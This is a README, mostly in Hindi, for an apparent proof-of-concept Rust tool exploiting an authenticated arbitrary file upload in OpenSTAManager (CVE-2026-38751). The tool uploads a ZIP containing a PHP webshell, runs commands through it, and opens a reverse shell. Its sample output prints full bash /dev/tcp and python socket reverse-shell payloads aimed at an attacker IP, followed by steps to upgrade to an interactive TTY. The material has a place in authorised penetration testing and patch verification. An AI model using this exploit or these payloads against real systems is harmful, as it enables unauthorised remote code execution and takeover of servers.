
OpenSTAManager-RCE-Exploit-CVE-2026-38751
दूरस्थ कोड निष्पादन की ओर ले जाने वाला मनमाना फ़ाइल अपलोड
CVE-2026-38751 के लिए पूर्ण-विशेषताओं वाला प्रूफ-ऑफ-कॉन्सेप्ट, जो Rust में लिखा गया है।
चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
OpenSTAManager ≤ 2.10, प्रमाणित मनमाना फ़ाइल अपलोड भेद्यता से ग्रस्त है, जो हमलावर को PHP वेबशेल युक्त एक दुर्भावनापूर्ण ZIP संग्रह अपलोड करने की अनुमति देता है। यह PoC इस प्रक्रिया को स्वचालित करता है:
| विशेषता | विवरण |
|---|---|
| लॉगिन | प्रदान किए गए क्रेडेंशियल्स का उपयोग करके प्रमाणित करता है। |
| ZIP निर्माण | एक मान्य MODULE डिस्क्रिप्टर और PHP शेल के साथ ZIP फ़ाइल बनाता है। |
| फ़ाइल अपलोड | अपडेट तंत्र के माध्यम से दुर्भावनापूर्ण ZIP भेजता है। |
| सत्यापन | जाँच करता है कि शेल सुलभ है या नहीं और एक परीक्षण कमांड (id) निष्पादित करता है। |
| इंटरैक्टिव वेब‑शेल | आपको वेबशेल के माध्यम से इंटरैक्टिव रूप से कमांड चलाने देता है (-i). |
| रिवर्स शेल | शेल प्राप्त करने के लिए कई पेलोड (bash, python, base64, nc, mkfifo) भेजता है। |
| TTY अपग्रेड निर्देश | पूर्ण रूप से इंटरैक्टिव TTY प्राप्त करने के लिए चरण‑दर‑चरण मार्गदर्शिका दिखाता है। |
| सफाई | अपलोड किए गए shell.php को स्वचालित रूप से हटा देता है (जब तक --no-cleanup न दिया गया हो)। |
रिपॉजिटरी क्लोन करें और बाइनरी बनाएँ:
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'
[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*] (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.
bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$